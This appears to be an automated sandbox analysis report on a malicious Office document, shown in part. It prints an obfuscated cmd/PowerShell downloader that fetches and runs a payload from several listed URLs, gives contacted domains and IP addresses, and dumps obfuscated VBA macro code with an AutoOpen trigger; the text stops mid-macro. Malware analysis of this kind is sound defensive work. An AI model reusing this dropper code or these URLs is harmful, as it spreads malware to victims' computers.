%mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 
9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))") - source
  - Monitored Target
- relevance
  - 10/10
Invokes a process with a very long commandline
- details
"Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 
9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" on 2018-5-17.00:56:07.351, "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" on 2018-5-17.00:56:07.701 - source
  - Monitored Target
- relevance
  - 10/10
Informative 20
Anti-Reverse Engineering
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
- details
  - "powershell.exe" is allocating memory with PAGE_GUARD access rights
- source
  - API Call
- relevance
  - 10/10
Environment Awareness
Tries to sleep for a long time (more than two minutes)
- details
  - "powershell.exe" sleeping for "1566804069" milliseconds
- source
  - API Call
- relevance
  - 10/10
External Systems
Detected Suricata Alert
- details
  - Detected alert "ET INFO EXE - Served Attached HTTP" (SID: 2014520, Rev: 6, Severity: 3) categorized as "Misc activity"
- source
  - Suricata Alerts
- relevance
  - 10/10
General
Contacts domains
- details
  - "ifcingenieria.cl"
- source
  - Network Traffic
- relevance
  - 1/10
Contacts server
- details
  - "138.0.120.12:80"
  - "37.120.170.231:443"
  - "81.21.67.85:8080"
- source
  - Network Traffic
- relevance
  - 1/10
Contains embedded VBA macros
- details
File "zTZADLcFXJtFRE.cls" (Streampath: "Macros/VBA/zTZADLcFXJtFRE") has code: "Sub GuJqoJ(uIvtS)fWYTPG = NfmOGUlKuOr = (zhISt / MKOVL / 95319 / Fix(lQzuPm)) + 9692 - CLng(kbHukT + CLng(4429)) + jNjBO + 98203 * NFaHud - CStr(97948) / aQNjq / CLng(QicmVO)End SubSub BYJoK(iIfwim)lopfK = mRhiWLjTjDO = (krMhQS / nTBuUj / 93344 / Fix(zbozb)) + 30534 - CLng(oTumDw + CLng(10735)) + YbhlC + 51901 * GZMaR - CStr(34687) / mJmoo / CLng(ruGmcH)sndOl = IcSnzuaUPkBz = (YhkAP / VUiVu / 17946 / Fix(YjTvzp)) + 68463 - CLng(nTVot + CLng(83577)) + WfWli + 94338 * LCdzbM - CStr(77145) / ztozYt / CLng(TmLOA)NOLVSL = wzIiztQSwOW = (pWcAt / QULja / 31136 / Fix(uzoSdI)) + 1963 - CLng(zwkJCf + CLng(47063)) + Bnzrfu + 83935 * Kczvdm - CStr(30277) / OBwXcA / CLng(FVfqX)End SubSub qrnrjK(cYQzFC)BIFNM = CvBjAJSsVAE = (tUkME / cTFpkw / 33776 / Fix(sUwQSd)) + 79918 - CLng(vpGqaI + CLng(57392)) + CQvmIm + 31019 * BTjOwF - CStr(31977) / jjIzvF / CLng(aiDYuF)STqVn = DfRGEPwtbt = (ZZHrAj / ziUIEO / 40786 / Fix(nAQYaS)) + 93344 - CLng(ERCsuq + CLng(69061)) + DJiVjG + 52892 * Jjpli - CStr(44295) / rjKbz / CLng(CTYcvD)End SubSub Autoopen()On Error Resume NextwnuHwn = ujzKhwOucK = (hDKJkO / EAqJsl / 5329 / Fix(UWmhn)) + 92083 - CLng(TLjzt + CLng(46233)) + nYvRAW + 43627 * dJsLiE - CStr(6989) / GZfYb / CLng(IuXzPk)musHwkwosI (ZkVOXN + dowlFKYHb + Oalji)scpbMN = pcaOzuQAuA = (moDYX / LrlIjo / 97175 / Fix(uAjFwm)) + 3288 - CLng(KzJHO + CLng(37268)) + BNjkZ + 85160 * oDSdBW - CStr(57435) / wmPGJt / CLng(vzOFRi)End SubSub PPirZ(vzDYBB)cnSkf = dAWrIJRRiVU = (OhoCuJ / tlzjqE / 15825 / Fix(HIidZa)) + 1303 - CLng(sYaiA + CLng(36452)) + QiEamf + 76967 * XbizsD - CStr(76827) / DBrJJ / CLng(suAOb)dUbwaH = AmiVCTHCqcI = (EXXjJ / UMqJZ / 47277 / Fix(rHDzm)) + 43266 - CLng(XnOYfp + CLng(79591)) + wpDXFY + 85293 * wumRn - CStr(37047) / cEwwc / CLng(DDEGY)RIwBUU = QAGBSfBGFzFz = (cmTiq / WtmzR / 64639 / Fix(bzwtSw)) + 9583 - CLng(KWCdS + CLng(55894)) + wwEBa + 52647 * WiSdHL - CStr(43980) / GklmX / CLng(ILhIs)End SubSub 
SQQFY(HwnuQG)mbTbo = tjvPSsFLomXs = (aWGNNF / DaaMU / 58582 / Fix(lcoks)) + 36527 - CLng(UWAwMr + CLng(59451)) + IBWXYr + 30228 * FOjSp - CStr(11483) / DzOMT / CLng(ACfZjF)End Sub"
File "FPAOsHRZpzGcVH.bas" (Streampath: "Macros/VBA/FPAOsHRZpzGcVH") has code: "Sub VIAJOC(BwfLOI)qwplPP = NVahnvAIjza = (hWYZq / HNCjjs / 18890 / Fix(zwQqFr)) + 83688 - CLng(nabaH + CLng(70764)) + qvNnq + 33935 * ZPvSI - CStr(55930) / mtpiU / CLng(Brsri)End SubFunction dowlFKYHb()On Error Resume NextZiwzPq = NMnTFJfZBv = (jOwBhm / mWzwDV / 9332 / Fix(skaSf)) + 53531 - CLng(PwwZkK + CLng(21676)) + bqwEzL + 54722 * RKTDzO - CStr(26130) / zACQuz / CLng(QLzwzD)csvhf = QZIMrHREbSi = (tsimY / KURAv / 58378 / Fix(irUEH)) + 78375 - CLng(LbpUXX + CLng(3634)) + zllLr + 7465 * duGXL - CStr(39646) / wZNiU / CLng(azAUd)tMMvPYQ = wQpJm("t.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZ", 19335 + 5 - 19335, 19335 + 82 - 19335)wSCNOA = BUjPjSfOZzj = (SwdQGp / ciCkQ / 66436 / Fix(Hkajs)) + 43061 - CLng(TuRKiv + CLng(4753)) + MXCkzX + 231 * mHZwrS - CStr(34467) / wAmLvn / CLng(FNmzBL)HsMznz = LKiaZZlhupXA = (bLzFvh / YwOzvi / 67115 / Fix(lmVnV)) + 79349 - CLng(ZufjfW + CLng(25988)) + lSDEfj + 29026 * sPkmLT - CStr(55580) / rDjvIT / CLng(iwAlCa)LshKN = wQpJm(".EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada", 11928 + 2 - 11928, 11928 + 109 - 11928)BTLEd = riDVWsXlCQGR = (scnSl / iZHfv / 24714 / Fix(jNQbG)) + 80302 - CLng(mMANYP + CLng(82968)) + tujfk + 46983 * ZjsTM - CStr(93894) / WXZJY / CLng(JUbKQT)jBihNL = oaCbzNwVTSGI = (PFHVrL / HJhvsO / 18327 / Fix(GwRUlT)) + 38864 - CLng(bOZZs + CLng(14552)) + XkRCR + 92432 * LWzDh - CStr(32905) / fEwpA / CLng(VAmWL)cwAkETD = wQpJm("w0mU9;)CDSAxmU9+m'+'U91
mU9+mU9)(pmU9+mU9e9mU9+mU9gNDtfiDtfrtSoTpmUlqsv", 29734 + 5 - 29734, 29734 + 66 - 29734)ljGSmk = tKLaLsjmvUh = (DwvJak / suWwvr / 42585 / Fix(rEDNS)) + 64402 - CLng(KUdmw + CLng(99052)) + iFRoZr + 75367 * zrBsHw - CStr(76000) / fUWrs / CLng(rHPEfn)oCahOj = HjokjBVZSKq = (awnkY / QwQPtH / 11663 / Fix(vWmWIz)) + 15974 - CLng(oIGYv + CLng(17090)) + OiQjK + 15385 * OpJOTr - CStr(81761) / vccWU / CLng(nwCswQ)ANzhp = wQpJm("wCGctacmU9+mU9};kmU9+mU9aerbmU9+mU'+'9;)mU9+mU9'+'CDmU9+mU9SmU9+mU9AxmU9+mU91(mU9+mU9)JQOmemU9+mU9tImU9+mU9-emU9+mU9JQO+JmU9+mU9QOk'+'JQO+JQmU9+mU9OovmU9+mU9nImU9+mU9JQO(&mU9+'+'C@9W", 52910 + 5 - 52910, 52910 + 175 - 52910)idAEH = CjcXvWHwMti = (TUNdv / oLbmO / 81963 / Fix(rjjLJ)) + 20646 - CLng(DonTF + CLng(64738)) + QrrjI + 27736 * wnRAEf - CStr(36711) / atNhji / CLng(YkDiS)lZMhf = XfzUiiEUGNS = (YjGiLq / fbTvhr / 63518 / Fix(RBovr)) + 16916 - CLng(ldULG + CLng(66071)) + cMJmV + 88738 * irAqs - CStr(82894) / LEnrvU / CLng(TSRaTQ)EoHkR = wQpJm("5FZ9thmU9'+'+mU9@/'+'omU9+mU9qmU9'+'+mU94mU9+mU9j6'+'mU9+mU97mU9+mU9/lmU9+mU9cmU9+mU9.aimU9+mU9reimU9+mU9negnimU9+mU9cfmU9+mU9i//:mU9+mU9ptth mU9+mU9 mU'+'90uC", 26023 + 4 - 26023, 26023 + 153 - 26023)cNAkEM = HlvWmoKnFzRN = (ZhUKO / JtsLBi / 52084 / Fix(dAGoi)) + 93274 - CLng(TrUIj + CLng(98240)) + iMbBC + 40466 * fjZqf - CStr(80549) / skUIN / CLng(jnwKmQ)BQrOHf = MZvXvabURH = (VtdUbt / jrAmZj / 16952 / Fix(mumSb)) + 37858 - CLng(CuazXQ + CLng(19306)) + ljBFn + 91155 * wQUbv - CStr(52000) / mVrmf / CLng(hhwfOl)aYofqzcWsE = wQpJm("WWJRAHC'+'[+1'+'01]RAHC['+'+75]RAH'+'C[( eCAlpEr-69]iw.", 41226 + 4 - 41226, 41226 + 50 - 41226)itbVQZ = OCYaVczWzzY = (rIFHk / VhDkVr / 4385 / Fix(pCpwL)) + 41532 - CLng(wkwRRD + CLng(49353)) + LBjpcA + 50890 * TlfEvL - CStr(34057) / jSYZv / CLng(wnCKuX)kdwFL = HTRkCJzPSzwM = (FCTUlV / zRqbcE / 81917 / Fix(mKNpF)) + 5216 - CLng(OLLwBP + CLng(39254)) + vhwPNh + 19710 * UqrJBb - CStr(17078) / EGccIl / CLng(GlLoI)wCffbz = wQpJm("I8lMrRAHC[,mU9'+'DtfmU9eCAlpEr- 
)mU9}'+'}'+'mU9+mU9{hCk", 17110 + 3 - 17110, 17110 + 48 - 17110)mTjcr = tfpdnctzNssn = (luvmr / JYpiC / 88107 / Fix(VhWIj)) + 20503 - CLng(PuPcoA + CLng(52883)) + JtsSAF + 44570 * XwlYmU - CStr(79997) / btaLL / CLng(EMhHnr)JuvDJF = PoiZunucGjYk = (sAAuv / dOqqEZ / 90260 / Fix(IVXbc)) + 23268 - CLng(KVDXnK + CLng(39074)) + woPbKQ + 87584 * IOYTBw - CStr(77544) / UtclG / CLng(IwYfhf)wdBSwU = wQpJm("
jcA+mU9 JQOx91JmU9+mU'+'9QmU9+mU'+'9O + c'+'imU9+mU9lbmU9+mU9upmU9+mU9:vnmU9+mU9emU9+mU9AmU9+mU9xmU9+mU91mU9+mU9 =mU9+mU9 '+'CDSAx1;)JQmU9+mU9O@JmU9+mU9QOmU9+mU9(tilpmU9+mU9SmU9+mUzjKEQ", 58872 + 6 - 58872, 58872 + 177 - 58872)XIWIor = owksPPMDtoM = (jDthiT / jTCfj / 26953 / Fix(lFBKMG)) + 75181 - CLng(WIkWjT + CLng(91490)) + fqVwNT + 28050 * aUcUVv - CStr(8709) / BbdHC / CLng(bGtDhl)jjNdYA = jmcSfwYzanJ = (quaRiC / dZitb / 8309 / Fix(pGVcXk)) + 55193 - CLng(NhHwRw + CLng(94753)) + XuHEz + 73123 * wvWfU - CStr(13185) / jqbEj / CLng(izPYU)cUuaIu = wQpJm("DF69+mU9emU9+mU99.cfmU9+mU9saAx'+'1(mU9+mU9p'+'e9elDtfIFdmU9+mU9aOmU9+mU9DtflnWmU9+m'+'U9DtfmU9+mU9omU9+mU9Dpe9.UYYmU9+mU9Ax1{ymU9+mU9rt{)XmU9+mU9CDAAmU9+mU9x1 nimU9+'+'mU9 cmUV2UY", 94876 + 5 - 94876, 94876 + 173 - 94876)hsJjlW = OGwUzuzYhBF = (mGwQW / Rfjaf / 66422 / Fix(AEQmLk)) + 17538 - CLng(sAlWcK + CLng(57507)) + FPNTM + 22368 * utMYEA - CStr(64062) / SlPuwh / CLng(VQvUtF)NTKLZ = XsjLjoqijIN = (DfjNjK / AoOCj / 54910 / Fix(bvPcwB)) + 69517 - CLng(dKTmYz + CLng(6402)) + GjmJwm + 64514 * aBAYi - CStr(56912) / iHzMuT / CLng(LLMJC)ZiFiTzufS = wQpJm("R7izc[
)901]raHc[+58]raHc[+75]raHc[(EcAlPer-)')mU9xmU9+]'+'43[eCrtf", 24238 + 5 - 24238, 24238 + 59 - 24238)uwmaw = HWuTopJBvBL = (zjpfZ / IfAUbz / 74975 / Fix(LLiOac)) + 86090 - CLng(HkoKW + CLng(62839)) + EQKAz + 6285 * ERMnoK - CStr(13755) / TVBGC / CLng(XjbjSd)HOsvr = TWGuWuwLApZ = (dwfUu / TckXY / 50269 / Fix(pKLZj)) + 21599 - CLng(ArsMn + CLng(14632)) + vFvmP + 78713 * RGbuz - CStr(88126) / UjwiU / CLng(EAmlU)dJWjr = wQpJm("76 ))421]raHc[,)601]raHc[+79]raHc[+45]raHc[( EcAlPer- 63]raHc[,'Ciu' EcaLperC- 93]raHLXuS", 47045 + 5 - 47045, 47045 + 83 - 47045)SNlESh = mYXolIFYEkfi = (jjIti / DLuSK / 33369 / Fix(WzfCIN)) + 20327 - CLng(zwuNZ + CLng(67532)) + jwCGmN + 66018 * dKoOja - CStr(57345) / iUYOF / CLng(BbSXJk)qDAuF = mVUSbiSqfOR = (cBJZh / SFtVwz / 83973 / Fix(pGjDU)) + 12607 - CLng(QTwzsI + CLng(28108)) + ZFGff + 26388 * hiTLn - CStr(83283) / zWSjJQ / CLng(GbuLK)UKjPWqjNw = wQpJm("07zsP$+]4[emOHsp$ ( .ta9.", 68412 + 5 - 68412, 68412 + 18 - 68412)hMcob = mUQrULnYFk = (SDXTZ / JwzGSi / 22342 / Fix(VCTUB)) + 58690 - CLng(jEZjiw + CLng(45702)) + doBqls + 13920 * OmwfcG - CStr(62350) / mjAqJ / CLng(DEGXj)sJmwrY = tvOwdEiPquj = (PbjQwu / WXmfQ / 4828 / Fix(MQnoGJ)) + 96537 - CLng(PSXZN + CLng(27968)) + IkwBO + 32621 * cWBwS - CStr(67353) / IjfaP / CLng(SbCoZs)ljaakrr = wQpJm("lH = mU9+mU9XCDAmU9+mU9Ax1;)'+'33128mU9+mU92mU9+mU'+'9 ,0mU9+mU90001mU9+mU9(txen.dmU9+mU9sadas'+'mU9+mU9nAm'+'U9+mU9xmU9+mU91 = BmU9+mU9SNmU9+mU9Ax1'+';tneilCbemU9+mU9W.teN.mU9+mU9memU9+mU9tsyS )JQmNCtf7f", 96976 + 7 - 96976, 96976 + 196 - 96976)LOsXhr = PCiPoSnRmJrP = (GiswwX / jiIbV / 39103 / Fix(OdiOa)) + 67680 - CLng(GAQmw + CLng(90704)) + KPiidz + 9773 * AZjUvj - CStr(38560) / nSzqYn / CLng(uQfrA)WNRNFU = ElpobiUFQp = (RdOvD / KRvcN / 57737 / Fix(NwjKAk)) + 12036 - CLng(UrcGw + CLng(55549)) + TuLru + 48287 * QHSNH - CStr(90228) / McXLJ / CLng(ZwJEj)ZWhhiPzoP = wQpJm(",6+mU9JQO8r%J", 65789 + 5 - 65789, 65789 + 7 - 65789)izmmpH = ozAQWjvjYsn = (LVHOEu / PwUlHL / 21729 / Fix(VdVdFi)) + 13173 - 
